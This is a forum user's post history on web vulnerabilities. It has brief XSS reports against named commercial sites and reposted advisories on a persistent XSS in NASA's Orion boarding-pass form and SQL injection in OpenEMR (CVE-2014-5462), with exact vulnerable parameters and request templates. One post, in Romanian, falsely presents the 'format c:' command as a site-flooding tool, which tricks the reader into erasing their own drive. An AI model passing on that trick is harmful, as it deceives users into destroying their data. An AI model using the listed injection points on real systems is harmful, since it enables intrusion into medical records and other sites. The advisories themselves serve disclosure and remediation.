KRONZI
-
Posts
28 -
Joined
-
Last visited
-
Days Won
1
Posts posted by KRONZI
-
-
#Author: KRONZY
#Type of vuln: XSS(Cross Site Scripting)
#Target: Ask.com
#Browser: Firefox.
#Os: Windows.
#P.O.C:
#Status: Raportat , e persistent.
-
#Author: KRONZY
#Type of vuln: XSS(Cross Site Scripting)
#Target: Orange.co.il
#Browser: Firefox.
#Os: Windows.
#P.O.C:
-
#Author: KRONZY
#Type of vuln: XSS(Cross Site Scripting)
#Target: Honda.co.il
#Browser: Firefox.
#Os: Windows.
#P.O.C:
-
Si eu am visual studio instalat , si tot acolo raman.
-
Dai in cmd :
format c:
Si dupa dai "y" de cate ori cere , la final iti cere site care sa-l floodezi.
-
Document Title:
===============
NASA Orion - Bypass, Persistent Issue & Embed Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1339
[VU#666988] US CERT
Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2014/12/05/nasa-mars-orion-program-researcher-reveals-vulnerability-boarding-pass
Reference Article: http://www.securityweek.com/exploit-payload-possibly-made-it-nasas-orion-spacecraft
Release Date:
=============
2014-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1339
Common Vulnerability Scoring System:
====================================
6
Product & Service Introduction:
===============================
People are being invited to sign up for a free `boarding pass`for trips into space. The plan is to start small with orbital flights
but will later involve flights to Mars. The US National Aeronautics and Space Administration is behind the scheme which is linked to
its new Orion spacecraft. It is expected to bring humans back into space for travel to far-flung destinations including the Red Planet.
And Nasa wants us all along for the ride. Sort of. It is inviting people to send in their names for inclusion in a penny-sized microchip
that will be carried on Orion’s first flight planned for December 4th. At time of publishing just over 114,000 people have signed up for
their “boarding pass” that will bring their name into space for a two-orbit flight and a splash-down in the Pacific Ocean. The names will
also fly on future Nasa exploration flights including missions to Mars. “When we set foot on the Red Planet, we’ll be exploring for all of
humanity,” says Mark Geyer, Orion programme manager. “Flying these names will enable people to be part of our journey.”
Nasa is using the web to collect names and social media to help promote it (#JourneyToMars). Sending your name isn’t quite like flying
yourself, but then there will be no question of space flight sickness and you don’t have to worry about getting your feet wet in cold
Pacific waters. Don’t delay as the closing date to add your name is October 31st. Submit your name to fly on Orion’s test flight by
visiting go.usa.gov/vcpz and learn more about Orion at nasa.gov/orion.
(Copy of the Homepage: http://mars.nasa.gov/participate/send-your-name/orion-first-flight/ & http://www.cnet.com/news/nasa-you-cant-fly-to-mars-but-your-name-can/)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side vulnerability and a filter bypass issue in the official Nasa Orion (mars) web-application.
Vulnerability Disclosure Timeline:
==================================
2014-10-09: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-10-10: Vendor Notification (US CERT Team)
2014-10-15: Vendor Response/Feedback (US CERT Team - Nasa Security Team)
2014-11-13: Vendor Fix/Patch Notification (Nasa JPL Developer Team)
2014-12-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
NASA (US) [GOV]
Product: Orion Mars - Boarding Pass 2014 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A filter bypass and persistent input validation web vulnerability (embed code exeuction) has been discovered in the official NASA Mars Program web-application.
The high severity vulnerability allows remote attackers to inject own system specific codes to the application-side of the affected NASA online-service website.
The issue is located in the firstname and lastname input fields of the nasa mission orion boarding pass module. Remote attackers are able to inject own script codes
as firstname and lastname to compromise the embed boarding pass module of the nasa website. The request method to inject is POST and the attack vector is on the
application-side of the vulnerable online-service module. After saving the malicious context to a boarding pass service the attacker can use the embed module to
stream malicious codes as embed code execution through the boarding pass application of the nasa mars program website.
In case of the scenario we would like to fly as first and inject a script code that gets stored in the nasa dbms. In a special case of a pentest ago the user limit
in the list runs that long since an error occurs. In case of the vote the nasa boarding pass list runs since the execution occurs and this will be the last entry
that counts. Result is that the user with the injected special crafted code could be able to become the first for a ticket.
The web filter of the service encodes for example frames or script code tags. Img onloads can pass through the filter validation and the second instance filter of
cloudflare to provoke an execution of script code in the embed nasa boarding pass module. The dime-size microship carries 1.3 million names that fly aboard Orion.
Engeneers wrote 1.3 million names onto the tiny 0.8 cm sqare (8 mm square) silicon wafer microchip. To write the context to the chip the E-beam litography tool was used.
After the input the payload gets flashed to a nasa chip that is configured to get send with mission orion to the space.
After the report to the US CERT Team informed the nasa about the issue and they closed the active ticket of the researcher. To ensure the ticket got closed the NASA
included an image that shows the user in the official Nasa `NO FLY List`. The researcher was that intelligent to inject three payloads. Two ids got observed by the
nasa team and one passed through the procedure of verification and validation with id 344***.
In a statement the nasa wrote back that the chip itself is not at risk because there is no interaction or running code with it. In case of the research the code has
been blocked since it got written to the silicon microchip. The context that gets written to the chip will be done manually for about 1.3 million users. In a later
conversation to other security team they acknowledged that it would be impossible to check 1.3 million user accounts. By watching the last id of the researcher included
as reference, the people can see that the name value of an accepted ticket is not secure validated. He used the word Payload1 as firstname and Payload2 as second name to
approve the validation.
The security risk of the embed code execution vulnerability in the boarding pass is estimated as high with a cvss (common vulnerability scoring system) count of 6.0.
Exploitation of the persistent remote web vulnerability requires no privileged application user account and only low user interaction. Successful exploitation of the
security vulnerability results in session hijacking, persistent phishing, persistent external redirect through nasa domains and persistent manipulation of affected or
connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] NASA Mars > Boarding Pass > Registration
Vulnerable Parameter(s):
[+] firstname
[+] lastname
Affected Module(s):
[+] NASA Mars - Boarding Pass (Embed Boarding Pass)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and
with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and
steps below to continue.
Manual steps to reproduce the remote vulnerability ...
1. Open the mars.nasa.gov website portal
2. Register a new boarding pass to register for the orion program
3. Iclude as firstname and lastname own script code to inject and to provoke the execution
Note: After saving the input the payload will be streamed to the invite of the boardpass index but also to the embed board pass module
4. The code execution occurs in the boarding pass website that displays the saved embed context information of the nasa customer/client
5. Successful reproduce of the security vulnerability!
PoC: Embed Exploitcode (Mars BoardingCard)
<iframe src="http://mars.nasa.gov/participate/send-your-name/orion-first-flight/?action=getcert&e=1&cn=334902" width="750" height="307" scrolling="no" frameborder="0"></iframe>
PoC: J2M1000000158467 (send-your-name/orion-first-flight/?s=confirm&cn=334902)
<div class="boarding">
<img src="/images/general/layout/hexAccentImage.png" class="graphic-right">
<div class="certificate-id">J2M1000000158467</div>
<div class="name">
<div style="font-size:1.5em;">"><"<[PERSISTENT INJECTED SCRIPT CODE VIA FIRSTNAME VALUES!]"></div>
<div>"><"<[PERSISTENT INJECTED SCRIPT CODE VIA LASTNAME VALUES!]"></div></div>
<img src="/images/mep/send-name-to-mars/Boarding-Pass.png" class="image-boarding" alt="boarding pass">
<div style="bottom:0;left:0;position:absolute;z-index:100;background-color: rgba(85, 85, 85, 0.5);width:100%;">
<div style="position:relative;z-index:101;float:right;margin-right:0%;margin-top:2px;margin-bottom:2px;">
<a target="_blank" style="color:#eee;text-decoration:none;font-weight:normal !important;border:none;display:inline-block;padding-right:
8px;padding-right:10px;line-height:16px; font-family: 'Helvetica Neue',Arial,sans-
serif;font-size: 12px;" href="http://mars.nasa.gov/participate/send-your-name/orion-first-flight/"><div style="font-size:16px;margin-left:6px;float:
right;font-weight:bold;">+</div><div style="float:left;">Image Credit: mars.nasa.gov</div></a>
</div>
<br clear="all">
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://mars.nasa.gov/participate/send-your-name/orion-first-flight/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[144] Mime Type[text/html]
Request Header:
Host[mars.nasa.gov]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://mars.nasa.gov/participate/send-your-name/orion-first-flight/]
Cookie[s_cc=true; s_vnum=1415451392569%26vn%3D3; s_sq=%5B%5BB%5D%5D; __utma=36124604.1688619800.1412859393.1412866915.1412869134.3;
__utmc=36124604; __utmz=36124604.1412859393.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2A1B4302851D2BE0-40000107A00688CE[CE];
fsr.s=%7B%22v2%22%3A1%2C%22v1%22%3A1%2C%22rid%22%3A%22d036702-53567014-5eea-b60c-7e184%22%2C%22ru%22%3A%22http%3A%2F%2F
mars.nasa.gov%2Fparticipate%2Fsend-your-name%2Forion-first-flight%2F%3Fcn%3D161115%22%2C%22r%22%3A%22mars.nasa.gov%22%2C%22st%22%3A%22%22%2C%22cp%22%3A%7B%22
delivery_src%22%3A%22none%22%7D%2C%22to%22%3A3%2C%22mid%22%3A%22d036702-53567258-d212-8c96-20007%22%2C%22rt%22%3Afalse%2C%22rc%22%3Afalse%2C%22c%22%3A%22
http%3A%2F%2Fwww.nasa.gov%2F%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A3%2C%22meta%22%3A%7B%22rtp
%22%3A%22a%22%2C%22rta%22%3A3%2C%22rts%22%3A3%7D%7D; __utma=259910805.435627752.1412859567.1412859567.1412859567.1; __utmc=259910805;
__utmz=259910805.1412859567.1.1.utmcsr=mars.nasa.gov|utmccn=(referral)|utmcmd=referral|utmcct=/participate/send-your-name/orion-first-flight/;
gpv_pe5=MEP%20-%20Send%20Your%20Name%20on%20NASA%27s%20Journey%20to%20Mars%2C%20Starting%20with%20Orion%27s%20First%20Flight;
s_invisit=true; __utmb=36124604.0.10.1412869134]
Connection[keep-alive]
POST-Daten:
action[submit]
pid[2]
FirstName[[PERSISTENT INJECTED SCRIPT CODE!]]
LastName[[PERSISTENT INJECTED SCRIPT CODE!]]
CountryCode[DE]
ZipCode[34128]
Email[research%40vulnerability-lab.com]
rp[]
recaptcha_challenge_field[03AHJ_VutiAgzfSZseCHPF92TfRrOZIIX-E6X078M8JwT-meq1bJthIybgz2TGRb_fl0QJdopcWTcJLSp2vy-DirSlgF370p4a4xnMI1D-
oypqwieb2Q5ckPquDsbrDV4Gp4u3B2jRORQn4KW4VEont0UfwogAMQgKBpqEjer1MrSEimu9LxVJRD3v-Jz40RRNTcR2FvsQqCL3hGPl27ca9RjTd7KrzM56-
xZRWdnXHfHmFNyLNSNzOrcCEvcv3ZW9oZVBoV0IQzL19g_zMXEOt61sAKOZbVDI0cT0DGUt2EGDlBJ81uj8dp0]
recaptcha_response_field[619]
Submit[SEND+MY+NAME]
Response Header:
Content-Type[text/html;charset=UTF-8]
Content-Length[144]
Connection[keep-alive]
Access-Control-Allow-Origin[http://marsdev.jpl.nasa.gov]
Cache-Control[max-age=600]
Date[Thu, 09 Oct 2014 15:46:04 GMT]
Location[./?s=confirm&cn=344616]
Server[nginx/1.1.19]
X-Cache[Miss from cloudfront]
Via[1.1 641720e73fe93af037f911457c12ae1e.cloudfront.net (CloudFront)]
X-Amz-Cf-Id[Ol1wi0YiljsLjsNOdJjXmYAjmvQgVMvLCh9WnjvbTFF0a4GKSVHifw==]
-
Status: 200[OK]
GET http://mars.nasa.gov/participate/send-your-name/orion-first-flight/?s=confirm&cn=344616
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[7642] Mime Type[text/html]
Request Header:
Host[mars.nasa.gov]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://mars.nasa.gov/participate/send-your-name/orion-first-flight/]
Cookie[s_cc=true; s_vnum=1415451392569%26vn%3D3; s_sq=%5B%5BB%5D%5D; __utma=36124604.1688619800.1412859393.1412866915.1412869134.3;
__utmc=36124604; __utmz=36124604.1412859393.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2A1B4302851D2BE0-40000107A00688CE[CE];
fsr.s=%7B%22v2%22%3A1%2C%22v1%22%3A1%2C%22rid%22%3A%22d036702-53567014-5eea-b60c-7e184%22%2C%22ru%22%3A%22http%3A%2F%2Fmars.nasa.gov%2Fparticipate
%2Fsend-your-name%2Forion-first-flight%2F%3Fcn%3D161115%22%2C%22r%22%3A%22mars.nasa.gov%22%2C%22st%22%3A%22%22%2C%22cp%22%3A%7B%22delivery_src%22%3A
%22none%22%7D%2C%22to%22%3A3%2C%22mid%22%3A%22d036702-53567258-d212-8c96-20007%22%2C%22rt%22%3Afalse%2C%22rc%22%3Afalse%2C%22c%22%3A%22http%3A%2F%2F
www.nasa.gov%2F%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A3%2C%22meta%22%3A%7B%22rtp%22%3A%22
a%22%2C%22rta%22%3A3%2C%22rts%22%3A3%7D%7D; __utma=259910805.435627752.1412859567.1412859567.1412859567.1; __utmc=259910805;
__utmz=259910805.1412859567.1.1.utmcsr=mars.nasa.gov|utmccn=(referral)|utmcmd=referral|utmcct=/participate/send-your-name/orion-first-flight/;
gpv_pe5=MEP%20-%20Send%20Your%20Name%20on%20NASA%27s%20Journey%20to%20Mars%2C%20Starting%20with%20Orion%27s%20First%20Flight; s_invisit=true; __utmb=36124604.0.10.1412869134]
Connection[keep-alive]
Response Header:
Content-Type[text/html;charset=UTF-8]
Content-Length[7642]
Connection[keep-alive]
Access-Control-Allow-Origin[http://marsdev.jpl.nasa.gov]
Cache-Control[max-age=600]
Content-Encoding[gzip]
Date[Thu, 09 Oct 2014 15:46:05 GMT]
Server[nginx/1.1.19]
Vary[Accept-Encoding]
X-Cache[Miss from cloudfront]
Via[1.1 641720e73fe93af037f911457c12ae1e.cloudfront.net (CloudFront)]
X-Amz-Cf-Id[fcCNBQ3RNkRMQ_9nK-1v_ConkoOko6ttxX2F0IDcwKGyovh3SJSAZg==]
Reference(s):
http://mars.nasa.gov/
http://mars.nasa.gov/participate/
http://mars.nasa.gov/participate/send-your-name/
http://mars.nasa.gov/participate/send-your-name/orion-first-flight/
http://mars.nasa.gov/participate/send-your-name/orion-first-flight/?s=confirm&cn=334902
http://mars.nasa.gov/participate/send-your-name/orion-first-flight/?s=confirm&cn=344616
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable firstname and lastname input fields.
Restrict and filter the input to prevent execution of persistent script codes in the board pass service.
Encode the boarding pass output values in the embed code module to block application-side script code executions.
Upgrade the filter and capture image onloads and image cookie requests.
Security Risk:
==============
The security risk of the filter bypass and persistent script code inject web vulnerability in the nasa boarding pass application is estimated as high. (CVSS 6.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txtSource:NASA Orion (Mars) Filter Bypass / Persistent Cross Site Scripting ? Packet Storm
-
Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR
CVE: CVE-2014-5462
Vendor: OpenEMR
Product: OpenEMR
Affected version: 4.1.2(7) and earlier
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.
The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
Request 1
POST /openemr/interface/super/edit_layout.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
[...]
Content-Length: 134
formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection>
Request 2
POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
[...]
Content-Length: 135
form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>
Request 3
POST /openemr/interface/billing/edit_payment.php HTTP/1.1
Host: 192.168.56.102
[...]
Content-Length: 186
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection*gt;&ParentPage=&hidden_patient_code=&global_amount=&mode=
Request 4
GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
Connection: keep-alive
Request 5
POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
----------1034262177
Content-Disposition: form-data; name="form_pid"
5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_without"
on
----------1034262177
Content-Disposition: form-data; name="form_deposit_date"
5
----------1034262177
Content-Disposition: form-data; name="form_paydate"
5
----------1034262177
Content-Disposition: form-data; name="form_category"
All
----------1034262177
Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
Content-Type: text/plain
boom
----------1034262177
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5000000
----------1034262177
Content-Disposition: form-data; name="form_amount"
5
----------1034262177
Content-Disposition: form-data; name="form_encounter"
5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_to_date"
5
----------1034262177
Content-Disposition: form-data; name="form_payer_id"
2
----------1034262177
Content-Disposition: form-data; name="form_source"
5
----------1034262177
Content-Disposition: form-data; name="form_name"
BOOOM
----------1034262177
Content-Disposition: form-data; name="form_search"
Search
----------1034262177
Content-Disposition: form-data; name="form_date"
5-5-5
----------1034262177--
Request 6
GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=<SQL Injection>&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
Request 7
POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4<SQL Injection>&form_from_date=0000-00-
Request 8
POST /openemr/interface/orders/pending_followup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original
form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5<SQL Injection>&form_from_date=2014-07-25
Request 9
POST /openemr/interface/orders/pending_orders.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4<SQL Injection>&form_from_date=2014-07-25
Request 10
POST /openemr/interface/patient_file/deleter.php?patient=<SQL Injection>&encounterid=<SQL Injection>&formid=<SQL Injection>&issue=<SQL Injection>&document=&payment=&billing=&transaction= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
form_submit=Yes%2c+Delete+and+Log
Request 11
POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5<SQL Injection>
Request 12
POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
text=5<SQL Injection<&submitbtn=Search&mode=search
Request 13
POST /openemr/interface/practice/ins_search.php HTTP/1.1
Host: 192.168.56.102
Accept: */*
Accept-Language: en
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
form_addr1=1<SQL Injection>&form_addr2=1<SQL Injection>&form_attn=5<SQL Injection>&form_country=U<SQL Injection>&form_freeb_type=2<SQL Injection>&form_phone=555-555-5555&form_partner=<SQL Injection>&form_name=P<SQL Injection>&form_zip=36<SQL Injection>&form_save=Save+as+New&form_state=W<SQL Injection>&form_city=W<SQL Injection>&form_cms_id=5<SQL Injection>
Request 14
POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6
form_pelist=%2f&form_pid=0<SQL Injection>&form_save=Save&form_key=e
Request 15
POST /openemr/interface/reports/appointments_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=<SQL Injection>&form_provider=1<SQL Injection>&form_apptstatus=<SQL Injection>&with_out_facility=on&form_facility=4<SQL Injection>&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date
Request 16
POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci
form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1<SQL Injection> &form_i1subscriber_employer_country=USA&form_d
eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW
1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em
ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female
Request 17
GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
Connection: keep-alive
Request 18
GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
##################################################################################### -
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
